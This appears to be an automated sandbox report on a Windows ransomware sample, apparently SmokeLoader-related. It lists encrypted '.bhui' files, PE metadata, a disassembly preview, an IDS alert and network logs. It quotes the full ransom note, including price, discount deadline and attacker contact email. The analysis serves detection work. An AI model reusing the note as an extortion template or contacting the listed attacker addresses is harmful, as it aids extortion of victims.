C:\Users\user\Favorites\Twitter.url.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.404303868042479
Encrypted:	false
SSDEEP:	12:SsZEPNXUlG+gX7AqW/6obu51eiClBhH1NrKwOWcii9a:SWgX7AbbnlBHN21WbD
MD5:	3395D605699597C73207D82027E0C115
SHA1:	C661AB960CCA76BB5AE73B1C109CC65EF13C0C15
SHA-256:	9C52677B96C22F99FD28412BF6BBBE4E76A1AEB009CFAD0CB70D187C6C219A54
SHA-512:	6EDE26D5F249BC211CD06A70DE8D5501BEC657A01701832C747D6427DBD3307B873537B088D7F98C1E8329C5B37AA88CF503F12D9FDCD83DB9DC497BF6000485
Malicious:	false
Reputation:	unknown
Preview:	[{000..p.[.#.cUD-...v..0.\|L......#).\|.%...#....^.......'.m^y...`<........+..o..3....TDI...K..57D..A........14......y..C/..9.........S..h5..#....hWj....l.{).=AF.O..6#vw.W:..y......R@V4N...=..y]...@..X.....#...O..m...'..7...4..q.n.N.j.Q..N..o.@+..-.k.....,....=....$..`b.=EU......;t}X..%Ci/..B..R#..e.....Q{..*....9......ef.rj....-N..y<1...H...h...lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Wikipedia.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	448
Entropy (8bit):	7.419850940325803
Encrypted:	false
SSDEEP:	6:JjxZjy3ojZHANPhFxdskPzArNcYDbIQacOVFtTj3rJmZmuhGzPZArXS3ccfgpfWX:5vZH8feacOlgXhGzPZI7Wcii9a
MD5:	4FF7EB812182AE02DB066D7331BC8F5A
SHA1:	3F54D7E750C2F0179D7268AAB9D8F66023C99AF2
SHA-256:	94DA4E567EED13333DCC77486D788499B4168AA0DDD9C46E182FB1F051128469
SHA-512:	7E18AA27B0FF33596B0EE705D537E44431C80E3F9D24DFC30BC021BC896BFF063756BC00376B3ECD67E53D057A06BF1109E3D02841072695C9A01E08EB4EFD20
Malicious:	false
Reputation:	unknown
Preview:	[{000. ./Fyx.T}.0.......,3....<.9.7..MF".\.CU.$6;..`...#5......E..xr..o.`hC.(^7-...`>..D.RW.O..lE]...6&..{.....8.c...l.W.BY.tHC...6.<G.....h....#.B...3<..f.,.MCA.....Z...@.5..'O.;.....Fn...........B...n..C..`.v..M".5...'...U.Na..t...K..kF.......L..y.D..U.`.T..8..$..ju.9-.2A.;..t..r...T^QD.U.pm..A...c3"..j(.1..R.w.:..;h.edM..@....z..@'w.z...(.`1.D.2k...lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Wikipedia.url.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	448
Entropy (8bit):	7.419850940325803
Encrypted:	false
SSDEEP:	6:JjxZjy3ojZHANPhFxdskPzArNcYDbIQacOVFtTj3rJmZmuhGzPZArXS3ccfgpfWX:5vZH8feacOlgXhGzPZI7Wcii9a
MD5:	4FF7EB812182AE02DB066D7331BC8F5A
SHA1:	3F54D7E750C2F0179D7268AAB9D8F66023C99AF2
SHA-256:	94DA4E567EED13333DCC77486D788499B4168AA0DDD9C46E182FB1F051128469
SHA-512:	7E18AA27B0FF33596B0EE705D537E44431C80E3F9D24DFC30BC021BC896BFF063756BC00376B3ECD67E53D057A06BF1109E3D02841072695C9A01E08EB4EFD20
Malicious:	false
Reputation:	unknown
Preview:	[{000. ./Fyx.T}.0.......,3....<.9.7..MF".\.CU.$6;..`...#5......E..xr..o.`hC.(^7-...`>..D.RW.O..lE]...6&..{.....8.c...l.W.BY.tHC...6.<G.....h....#.B...3<..f.,.MCA.....Z...@.5..'O.;.....Fn...........B...n..C..`.v..M".5...'...U.Na..t...K..kF.......L..y.D..U.`.T..8..$..ju.9-.2A.;..t..r...T^QD.U.pm..A...c3"..j(.1..R.w.:..;h.edM..@....z..@'w.z...(.`1.D.2k...lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Youtube.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.463183534665457
Encrypted:	false
SSDEEP:	12:BAjrvMGMke4y37yejvrxHjbRsXFwkzoWcii9a:u6ykdbRowFWbD
MD5:	B63EF4BDEB648F2D4E60D79C63E51C7D
SHA1:	15D8920E7F1A38D6129828BFDB4E36F19529B9CF
SHA-256:	083339475E6728DEF8B9FB663E2A853F316941D38F41A09CFE10D3FAB26351B4
SHA-512:	5F0AED2FB438F0ED553B9C90291E1978C0AAD7F1A5672DF21F8200A3F896D8A8AE851874D82C7238C7A3E4E10F1F79760DD01E815BC5A444CD42A0FADEAAFE84
Malicious:	false
Reputation:	unknown
Preview:	[{000{O..~;.z.E....b.2.....@..r...&`..(.N.>.......\|a...g....\.DR....bm]......,.G.n. .J.=..._X4...C.t.V#..[h\..nV..5.,...chG...Hm..P?e.k....1...:.!.....=..^...n?.0.O[~=.......m.^Z..."...#'...k.r"H*.t.s....S.[.$.;....`....I.....%..'U.d5.vM.X..X.'..P..B...9).ZU....C.NY,.;....Ny4.={...........].:.M...V.t....&.(..`t...C=...8.......\......S1&.S..J....QV....lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Youtube.url.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.463183534665457
Encrypted:	false
SSDEEP:	12:BAjrvMGMke4y37yejvrxHjbRsXFwkzoWcii9a:u6ykdbRowFWbD
MD5:	B63EF4BDEB648F2D4E60D79C63E51C7D
SHA1:	15D8920E7F1A38D6129828BFDB4E36F19529B9CF
SHA-256:	083339475E6728DEF8B9FB663E2A853F316941D38F41A09CFE10D3FAB26351B4
SHA-512:	5F0AED2FB438F0ED553B9C90291E1978C0AAD7F1A5672DF21F8200A3F896D8A8AE851874D82C7238C7A3E4E10F1F79760DD01E815BC5A444CD42A0FADEAAFE84
Malicious:	false
Reputation:	unknown
Preview:	[{000{O..~;.z.E....b.2.....@..r...&`..(.N.>.......\|a...g....\.DR....bm]......,.G.n. .J.=..._X4...C.t.V#..[h\..nV..5.,...chG...Hm..P?e.k....1...:.!.....=..^...n?.0.O[~=.......m.^Z..."...#'...k.r"H*.t.s....S.[.$.;....`....I.....%..'U.d5.vM.X..X.'..P..B...9).ZU....C.NY,.;....Ny4.={...........].:.M...V.t....&.(..`t...C=...8.......\......S1&.S..J....QV....lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\_readme.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1114
Entropy (8bit):	4.874148150427854
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYLuWrmFRqrl3W4kA+GT/kF5M2/kLw3KTJz:WZHfv0p6WrPFWrDGT0f/kr5
MD5:	EC5DB72F32E556F810532FCE9D7B85E5
SHA1:	E01B18563609170BBA6D11714F1F6F476E914EE3
SHA-256:	F8326C847B58D6C3171A276BCCC369F20D0EF1B7B968BBCD5F9D0584F83FD678
SHA-512:	202F4FB912E5742A460D671EBF006ABB564C60B34178A4D4D98C26C7A1D8DCDE9D037CC600977D4A6AF9D2C9E74DBADE83C7A51B5114CE4B7D1F9B4EDA65BC87
Malicious:	true
Reputation:	unknown
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-vKvLYNOV9o..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@freshmail.top....Reserve e-mail address

C:\_readme.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1114
Entropy (8bit):	4.874148150427854
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYLuWrmFRqrl3W4kA+GT/kF5M2/kLw3KTJz:WZHfv0p6WrPFWrDGT0f/kr5
MD5:	EC5DB72F32E556F810532FCE9D7B85E5
SHA1:	E01B18563609170BBA6D11714F1F6F476E914EE3
SHA-256:	F8326C847B58D6C3171A276BCCC369F20D0EF1B7B968BBCD5F9D0584F83FD678
SHA-512:	202F4FB912E5742A460D671EBF006ABB564C60B34178A4D4D98C26C7A1D8DCDE9D037CC600977D4A6AF9D2C9E74DBADE83C7A51B5114CE4B7D1F9B4EDA65BC87
Malicious:	true
Reputation:	unknown
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-vKvLYNOV9o..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@freshmail.top....Reserve e-mail address

C:\bootTel.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	414
Entropy (8bit):	7.4202012101298545
Encrypted:	false
SSDEEP:	12:wM7XUIDeN4CEgGlpLN2HiE/tdPqenWcii9a:J7EISNFEgyp8iE3qenWbD
MD5:	5D5F06ACFCED43F619674573DE00556D
SHA1:	1D093FF08207C98A3099747B927D1F5292DCAEB8
SHA-256:	61DEC5F8880B0043E2CF9887BB69E7F6A5D3B82917465CCC1265B614920FD03E
SHA-512:	542E61A64A888C132AEF14BD00792D375A8BD4A331822BACD7C14B38B0CDA7B628911AFB846058B9EED18281F52E74244BCA08A5A4983D1E09DB9254BB03041D
Malicious:	false
Reputation:	unknown
Preview:	P.......d....:.nZ.6..Q.....>dM..v........FfAb..,...V.....&.\|....1w..SF...C...W...!...$E!p..v..r.0...T.pt.u.....%...G8Q.A.k..:..."...`,.a.._......W.....]...i.....$.N...o.w..I...f&....\T.8[9z.&c..^.._...sP=A..Nd.z..3..+u..SPf...< XR.~U6.Q9.....]&...1j.u8D... ......?......&.0........h.O. .C\/K.p.....G....4.Q.r..v..S..lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\bootTel.dat.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	414
Entropy (8bit):	7.4202012101298545
Encrypted:	false
SSDEEP:	12:wM7XUIDeN4CEgGlpLN2HiE/tdPqenWcii9a:J7EISNFEgyp8iE3qenWbD
MD5:	5D5F06ACFCED43F619674573DE00556D
SHA1:	1D093FF08207C98A3099747B927D1F5292DCAEB8
SHA-256:	61DEC5F8880B0043E2CF9887BB69E7F6A5D3B82917465CCC1265B614920FD03E
SHA-512:	542E61A64A888C132AEF14BD00792D375A8BD4A331822BACD7C14B38B0CDA7B628911AFB846058B9EED18281F52E74244BCA08A5A4983D1E09DB9254BB03041D
Malicious:	false
Reputation:	unknown
Preview:	P.......d....:.nZ.6..Q.....>dM..v........FfAb..,...V.....&.\|....1w..SF...C...W...!...$E!p..v..r.0...T.pt.u.....%...G8Q.A.k..:..."...`,.a.._......W.....]...i.....$.N...o.w..I...f&....\T.8[9z.&c..^.._...sP=A..Nd.z..3..+u..SPf...< XR.~U6.Q9.....]&...1j.u8D... ......?......&.0........h.O. .C\/K.p.....G....4.Q.r..v..S..lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.935000051693485
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	207872
MD5:	22db1211ad126909ed458baa3bc4c424
SHA1:	614f8a0c23210f5a83854262042425c511a99999
SHA256:	0e2bf57a9ed2f7ac44d5a2c551ab8a88a677e59a894dadce533fc2f92c6f7686
SHA512:	2b32ea4262cfcd714b8508004cd7bad39369f38fc0b8ab9b914b890465e22494d9c8a90d71f62867956a8c1a0da859cd8fdec4f340c3464d2fa06ced73d8bbb9
SSDEEP:	3072:fUBZWKxWYm3UvpGlXniBnpvxh+KKEI4NR6Qbnh:M2K8Yhp6X6hVxIVQT
TLSH:	1B14CF1136B1C0B2D52B82355431C6B06A2FB87297B389DBE344677F4D336E16AFA352
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.....i...i...i.......i.....3.i.....e.i.$>....i...h...i.......i.......i.......i.Rich..i.........................PE..L....-.a...

File Icon


Icon Hash:	452941514155510d

Static PE Info

General

Entrypoint:	0x405c7e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x61CA2DEF [Mon Dec 27 21:19:43 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	10a1629063b41fbd482a6c6b674ffcb2

Entrypoint Preview

Instruction
call 00007FB640E378CBh
jmp 00007FB640E32B8Dh
mov edi, edi
push ebp
mov ebp, esp
push esi
lea eax, dword ptr [ebp+08h]
push eax
mov esi, ecx
call 00007FB640E32639h
mov dword ptr [esi], 00401300h
mov eax, esi
pop esi
pop ebp
retn 0004h
mov dword ptr [ecx], 00401300h
jmp 00007FB640E326EEh
mov edi, edi
push ebp
mov ebp, esp
push esi
mov esi, ecx
mov dword ptr [esi], 00401300h
call 00007FB640E326DBh
test byte ptr [ebp+08h], 00000001h
je 00007FB640E32D19h
push esi
call 00007FB640E329ADh
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
mov edi, edi
push ebp
mov ebp, esp
push esi
push edi
mov edi, dword ptr [ebp+08h]
mov eax, dword ptr [edi+04h]
test eax, eax
je 00007FB640E32D59h
lea edx, dword ptr [eax+08h]
cmp byte ptr [edx], 00000000h
je 00007FB640E32D51h
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [esi+04h]
cmp eax, ecx
je 00007FB640E32D26h
add ecx, 08h
push ecx
push edx
call 00007FB640E36EB0h
pop ecx
pop ecx
test eax, eax
je 00007FB640E32D16h
xor eax, eax
jmp 00007FB640E32D36h
test byte ptr [esi], 00000002h
je 00007FB640E32D17h
test byte ptr [edi], 00000008h
je 00007FB640E32D04h
mov eax, dword ptr [ebp+10h]
mov eax, dword ptr [eax]
test al, 01h
je 00007FB640E32D17h
test byte ptr [edi], 00000001h
je 00007FB640E32CF6h
test al, 02h
je 00007FB640E32D17h
test byte ptr [edi], 00000002h
je 00007FB640E32CEDh
xor eax, eax
inc eax
pop edi
pop esi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax]
cmp eax, 00004F4Dh

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[C++] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x24d80	0x64	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb5000	0x7aa8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xbd000	0xd34	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1230	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3208	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1d8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x24842	0x24a00	False	0.8106068686006825	data	7.591220711229014	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x26000	0x8e360	0x4000	False	0.0772705078125	data	0.977280910255725	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xb5000	0x7aa8	0x7c00	False	0.518586189516129	data	4.83792547731211	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xbd000	0x200a	0x2200	False	0.3288143382352941	data	3.4306576060030487	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
DOKUCODAPET	0xbb440	0x719	ASCII text, with very long lines (1817), with no line terminators	Telugu	India	0.6103467253714915
RT_ICON	0xb52e0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Telugu	India	0.56636460554371
RT_ICON	0xb6188	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Telugu	India	0.5505415162454874
RT_ICON	0xb6a30	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Telugu	India	0.6134393063583815
RT_ICON	0xb6f98	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Telugu	India	0.4648340248962656
RT_ICON	0xb9540	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Telugu	India	0.48827392120075047
RT_ICON	0xba5e8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Telugu	India	0.49631147540983606
RT_ICON	0xbaf70	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Telugu	India	0.450354609929078
RT_STRING	0xbbd68	0x4f0	data			0.45332278481012656
RT_STRING	0xbc258	0x84a	data			0.4114043355325165
RT_GROUP_ICON	0xbb3d8	0x68	data	Telugu	India	0.6923076923076923
RT_VERSION	0xbbb60	0x204	data			0.5348837209302325

Imports

DLL	Import
KERNEL32.dll	VirtualQuery, GetProfileIntW, ClearCommError, SetUnhandledExceptionFilter, ReadConsoleA, InterlockedDecrement, GetLogicalDriveStringsW, GetComputerNameW, OpenSemaphoreA, LockFile, GetTickCount, GetCommConfig, VirtualFree, FormatMessageA, GetWindowsDirectoryA, SetCommTimeouts, GetVolumePathNameW, FindResourceExA, LoadLibraryW, FatalAppExitW, GetSystemWindowsDirectoryA, GetVersionExW, WriteConsoleW, GetModuleFileNameW, GetCompressedFileSizeA, GetACP, SetFilePointer, GetStringTypeExA, GetConsoleAliasesW, SetCurrentDirectoryA, GetLastError, GetProcAddress, VirtualAlloc, BeginUpdateResourceW, LoadLibraryA, OpenMutexA, MoveFileA, CreateFileMappingW, BeginUpdateResourceA, PurgeComm, GetCurrentDirectoryA, ReadConsoleInputW, FindFirstVolumeW, GetCurrentProcessId, CloseHandle, CreateFileA, FlushFileBuffers, CreateMutexW, FindVolumeClose, GetDateFormatW, ReplaceFileA, GetVolumeNameForVolumeMountPointA, InterlockedIncrement, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetCommandLineA, GetStartupInfoA, UnhandledExceptionFilter, HeapFree, RtlUnwind, RaiseException, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, HeapAlloc, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, HeapSize, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, WriteFile, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, QueryPerformanceCounter, GetSystemTimeAsFileTime, HeapReAlloc, GetCPInfo, GetOEMCP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, MultiByteToWideChar, GetStringTypeW, GetConsoleCP, GetConsoleMode, InitializeCriticalSectionAndSpinCount, LCMapStringA, LCMapStringW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP
USER32.dll	CharUpperBuffA, LoadMenuW, GetSysColorBrush, SetCaretPos, CharToOemBuffA
GDI32.dll	GetPolyFillMode
ADVAPI32.dll	ReadEventLogW, ReportEventW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Telugu	India

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.38.8.8.852387532045695 06/21/23-04:27:34.064906	UDP	2045695	ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org)	52387	53	192.168.2.3	8.8.8.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 21, 2023 04:27:34.118736029 CEST	49698	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:34.137420893 CEST	80	49698	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:34.137574911 CEST	49698	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:34.137945890 CEST	49698	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:34.138010979 CEST	49698	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:34.154815912 CEST	80	49698	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:34.154871941 CEST	80	49698	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:34.266649961 CEST	80	49698	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:34.266736984 CEST	80	49698	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:34.266882896 CEST	49698	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:34.283359051 CEST	49698	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:34.283418894 CEST	49698	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:34.300246000 CEST	80	49698	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:34.300312042 CEST	80	49698	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:34.365233898 CEST	80	49698	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:34.365293026 CEST	80	49698	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:34.365472078 CEST	49698	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:34.511647940 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:34.659436941 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:34.659785032 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:34.660640955 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:34.849483013 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.182034969 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.182109118 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.182156086 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.182207108 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.182470083 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:35.331747055 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.331823111 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.331876993 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.331933022 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:35.332695007 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.332766056 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:35.332768917 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.332819939 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.332869053 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:35.332870007 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.332918882 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.332968950 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:35.488820076 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.488915920 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.488966942 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.489015102 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.489015102 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:35.489063978 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.489078045 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:35.489116907 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.489165068 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.489183903 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:35.489212990 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.489259958 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:35.489259958 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.489309072 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.489355087 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.489366055 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:35.489403009 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.489450932 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.489455938 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:35.489499092 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.489550114 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.489551067 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:35.489598989 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.489646912 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:35.654870033 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.654973984 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.655050039 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.655098915 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:35.655119896 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.655200005 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:35.655214071 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.655266047 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.655312061 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.655333996 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:35.655361891 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.655410051 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:35.655424118 CEST	49699	80	192.168.2.3	37.34.248.24
